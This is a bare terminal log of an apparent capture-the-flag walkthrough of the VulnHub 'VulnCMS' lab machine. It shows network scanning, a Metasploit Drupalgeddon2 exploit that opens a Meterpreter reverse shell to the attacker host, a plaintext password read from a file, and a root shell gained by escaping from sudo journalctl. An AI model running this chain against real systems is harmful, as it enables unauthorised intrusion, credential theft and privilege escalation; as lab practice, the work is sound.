vulnhub-VulnCMS

sudo arp-scan 192.168.109.0/24
[sudo] password for kali: 
Interface: eth0, type: EN10MB, MAC: 00:0c:29:d6:59:a7, IPv4: 192.168.109.140
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.109.1   00:50:56:c0:00:08       VMware, Inc.
192.168.109.2   00:50:56:f0:a1:15       VMware, Inc.
192.168.109.145 00:0c:29:da:98:92       VMware, Inc.
192.168.109.254 00:50:56:f8:89:68       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 1.938 seconds (132.09 hosts/sec). 4 responded

sudo nmap -sC -sV -p- 192.168.109.145
[sudo] password for kali: 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-27 12:43 EDT
Nmap scan report for 192.168.109.145
Host is up (0.0014s latency).
Not shown: 65530 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8c:9f:7e:78:82:ef:76:f6:26:23:c9:52:6d:aa:fe:d0 (RSA)
|   256 2a:e2:f6:d2:52:1c:c1:d0:3d:aa:40:e6:b5:08:1d:45 (ECDSA)
|_  256 fa:c9:eb:58:e3:d2:b7:4a:74:77:fc:69:0e:b6:68:08 (ED25519)
80/tcp   open  http    nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: W3.CSS Template
5000/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-generator: WordPress 5.7.2
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: fsociety – Just another WordPress site
8081/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-generator: Joomla! - Open Source Content Management
| http-robots.txt: 15 disallowed entries 
| /joomla/administrator/ /administrator/ /bin/ /cache/ 
| /cli/ /components/ /includes/ /installation/ /language/ 
|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Home
9001/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-generator: Drupal 7 (http://drupal.org)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: fsociety.web
MAC Address: 00:0C:29:DA:98:92 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.84 seconds

msfconsole 
                                                  
                                              `:oDFo:`                            
                                           ./ymM0dayMmy/.                          
                                        -+dHJ5aGFyZGVyIQ==+-                    
                                    `:sm⏣~~Destroy.No.Data~~s:`                
                                 -+h2~~Maintain.No.Persistence~~h+-              
                             `:odNo2~~Above.All.Else.Do.No.Harm~~Ndo:`          
                          ./etc/shadow.0days-Data'%20OR%201=1--.No.0MN8'/.      
                       -++SecKCoin++e.AMd`       `.-://///+hbove.913.ElsMNh+-    
                      -~/.ssh/id_rsa.Des-                  `htN01UserWroteMe!-  
                      :dopeAW.No<nano>o                     :is:TЯiKC.sudo-.A:  
                      :we're.all.alike'`                     The.PFYroy.No.D7:  
                      :PLACEDRINKHERE!:                      yxp_cmdshell.Ab0:    
                      :msf>exploit -j.                       :Ns.BOB&ALICEes7:    
                      :---srwxrwx:-.`                        `MS146.52.No.Per:    
                      :<script>.Ac816/                        sENbove3101.404:    
                      :NT_AUTHORITY.Do                        `T:/shSYSTEM-.N:    
                      :09.14.2011.raid                       /STFU|wall.No.Pr:    
                      :hevnsntSurb025N.                      dNVRGOING2GIVUUP:    
                      :#OUTHOUSE-  -s:                       /corykennedyData:    
                      :$nmap -oS                              SSo.6178306Ence:    
                      :Awsm.da:                            /shMTl#beats3o.No.:    
                      :Ring0:                             `dDestRoyREXKC3ta/M:    
                      :23d:                               sSETEC.ASTRONOMYist:    
                       /-                        /yo-    .ence.N:(){ :|: & };:    
                                                 `:Shall.We.Play.A.Game?tron/    
                                                 ```-ooy.if1ghtf0r+ehUser5`    
                                               ..th3.H1V3.U2VjRFNN.jMh+.`          
                                              `MjM~~WE.ARE.se~~MMjMs              
                                               +~KANSAS.CITY's~-`                  
                                                J~HAKCERS~./.`                    
                                                .esc:wq!:`                        
                                                 +++ATH`                            
                                                  `


       =[ metasploit v6.0.30-dev                          ]
+ -- --=[ 2099 exploits - 1129 auxiliary - 357 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: When in a module, use back to go 
back to the top level prompt

msf6 > search Drupal

Matching Modules
================

   #  Name                                           Disclosure Date  Rank       Check  Description
   -  ----                                           ---------------  ----       -----  -----------
   0  auxiliary/gather/drupal_openid_xxe             2012-10-17       normal     Yes    Drupal OpenID External Entity Injection
   1  auxiliary/scanner/http/drupal_views_user_enum  2010-07-02       normal     Yes    Drupal Views Module Users Enumeration
   2  exploit/multi/http/drupal_drupageddon          2014-10-15       excellent  No     Drupal HTTP Parameter Key/Value SQL Injection
   3  exploit/unix/webapp/drupal_coder_exec          2016-07-13       excellent  Yes    Drupal CODER Module Remote Command Execution
   4  exploit/unix/webapp/drupal_drupalgeddon2       2018-03-28       excellent  Yes    Drupal Drupalgeddon 2 Forms API Property Injection
   5  exploit/unix/webapp/drupal_restws_exec         2016-07-13       excellent  Yes    Drupal RESTWS Module Remote PHP Code Execution
   6  exploit/unix/webapp/drupal_restws_unserialize  2019-02-20       normal     Yes    Drupal RESTful Web Services unserialize() RCE
   7  exploit/unix/webapp/php_xmlrpc_eval            2005-06-29       excellent  Yes    PHP XML-RPC Arbitrary Code Execution


Interact with a module by name or index. For example info 7, use 7 or use exploit/unix/webapp/php_xmlrpc_eval

msf6 > use exploit/unix/webapp/drupal_drupalgeddon2
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 192.168.109.145
rhosts => 192.168.109.145
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rport 9001
rport => 9001
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > exploit 

[*] Started reverse TCP handler on 192.168.109.140:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable.
[*] Sending stage (39282 bytes) to 192.168.109.145
[*] Meterpreter session 1 opened (192.168.109.140:4444 -> 192.168.109.145:45078) at 2021-07-27 13:18:40 -0400

cat tyrell.pass
Username: tyrell
Password: mR_R0bo7_i5_R3@!_

sudo -l
Matching Defaults entries for tyrell on vuln_cms:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User tyrell may run the following commands on vuln_cms:
    (root) NOPASSWD: /bin/journalctl

sudo journalctl 
-- Logs begin at Fri 2021-05-28 12:16:41 UTC, end at Tue 2021-07-27 17:31:18 UTC. --
May 28 12:16:41 vuln_cms kernel: Linux version 4.15.0-143-generic (buildd@lcy01-amd64-001) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #147-Ubuntu SMP Wed Apr 14 16:10:11 UT
May 28 12:16:41 vuln_cms kernel: Command line: BOOT_IMAGE=/vmlinuz-4.15.0-143-generic root=/dev/mapper/ubuntu--vg-ubuntu--lv ro maybe-ubiquity
May 28 12:16:41 vuln_cms kernel: KERNEL supported cpus:
May 28 12:16:41 vuln_cms kernel:   Intel GenuineIntel
May 28 12:16:41 vuln_cms kernel:   AMD AuthenticAMD
May 28 12:16:41 vuln_cms kernel:   Centaur CentaurHauls
May 28 12:16:41 vuln_cms kernel: [Firmware Bug]: TSC doesn't count with P0 frequency!
May 28 12:16:41 vuln_cms kernel: x86/fpu: Supporting XSAVE feature 0x001: 'x87 floating point registers'
May 28 12:16:41 vuln_cms kernel: x86/fpu: Supporting XSAVE feature 0x002: 'SSE registers'
May 28 12:16:41 vuln_cms kernel: x86/fpu: Supporting XSAVE feature 0x004: 'AVX registers'
May 28 12:16:41 vuln_cms kernel: x86/fpu: xstate_offset[2]:  576, xstate_sizes[2]:  256
May 28 12:16:41 vuln_cms kernel: x86/fpu: Enabled xstate features 0x7, context size is 832 bytes, using 'standard' format.
May 28 12:16:41 vuln_cms kernel: e820: BIOS-provided physical RAM map:
May 28 12:16:41 vuln_cms kernel: BIOS-e820: [mem 0x0000000000000000-0x000000000009fbff] usable
May 28 12:16:41 vuln_cms kernel: BIOS-e820: [mem 0x000000000009fc00-0x000000000009ffff] reserved
May 28 12:16:41 vuln_cms kernel: BIOS-e820: [mem 0x00000000000f0000-0x00000000000fffff] reserved
May 28 12:16:41 vuln_cms kernel: BIOS-e820: [mem 0x0000000000100000-0x000000007ffeffff] usable
May 28 12:16:41 vuln_cms kernel: BIOS-e820: [mem 0x000000007fff0000-0x000000007fffffff] ACPI data
May 28 12:16:41 vuln_cms kernel: BIOS-e820: [mem 0x00000000fec00000-0x00000000fec00fff] reserved
May 28 12:16:41 vuln_cms kernel: BIOS-e820: [mem 0x00000000fee00000-0x00000000fee00fff] reserved
May 28 12:16:41 vuln_cms kernel: BIOS-e820: [mem 0x00000000fffc0000-0x00000000ffffffff] reserved
May 28 12:16:41 vuln_cms kernel: NX (Execute Disable) protection: active
May 28 12:16:41 vuln_cms kernel: SMBIOS 2.5 present.
May 28 12:16:41 vuln_cms kernel: DMI: innotek GmbH VirtualBox/VirtualBox, BIOS VirtualBox 12/01/2006
May 28 12:16:41 vuln_cms kernel: Hypervisor detected: KVM
May 28 12:16:41 vuln_cms kernel: e820: update [mem 0x00000000-0x00000fff] usable ==> reserved
May 28 12:16:41 vuln_cms kernel: e820: remove [mem 0x000a0000-0x000fffff] usable
May 28 12:16:41 vuln_cms kernel: e820: last_pfn = 0x7fff0 max_arch_pfn = 0x400000000
May 28 12:16:41 vuln_cms kernel: MTRR default type: uncachable
May 28 12:16:41 vuln_cms kernel: MTRR variable ranges disabled:
May 28 12:16:41 vuln_cms kernel: MTRR: Disabled
May 28 12:16:41 vuln_cms kernel: x86/PAT: MTRRs disabled, skipping PAT initialization too.
May 28 12:16:41 vuln_cms kernel: CPU MTRRs all blank - virtualized system.
May 28 12:16:41 vuln_cms kernel: x86/PAT: Configuration [0-7]: WB  WT  UC- UC  WB  WT  UC- UC  
May 28 12:16:41 vuln_cms kernel: found SMP MP-table at [mem 0x0009fff0-0x0009ffff]
May 28 12:16:41 vuln_cms kernel: Scanning 1 areas for low memory corruption
May 28 12:16:41 vuln_cms kernel: RAMDISK: [mem 0x30ec5000-0x34759fff]
May 28 12:16:41 vuln_cms kernel: ACPI: Early table checksum verification disabled
May 28 12:16:41 vuln_cms kernel: ACPI: RSDP 0x00000000000E0000 000024 (v02 VBOX  )
May 28 12:16:41 vuln_cms kernel: ACPI: XSDT 0x000000007FFF0030 00003C (v01 VBOX   VBOXXSDT 00000001 ASL  00000061)
May 28 12:16:41 vuln_cms kernel: ACPI: FACP 0x000000007FFF00F0 0000F4 (v04 VBOX   VBOXFACP 00000001 ASL  00000061)
May 28 12:16:41 vuln_cms kernel: ACPI: DSDT 0x000000007FFF0470 002325 (v02 VBOX   VBOXBIOS 00000002 INTL 20100528)
May 28 12:16:41 vuln_cms kernel: ACPI: FACS 0x000000007FFF0200 000040
May 28 12:16:41 vuln_cms kernel: ACPI: FACS 0x000000007FFF0200 000040
!/bin/sh
# id
uid=0(root) gid=0(root) groups=0(root)

# cd /home/     
# ls
elliot  ghost  tyrell
# cd elliot
# cat user.txt
9046628504775551
# cd /root/
# ls
root.txt
# cat root.txt
4359537020406305
#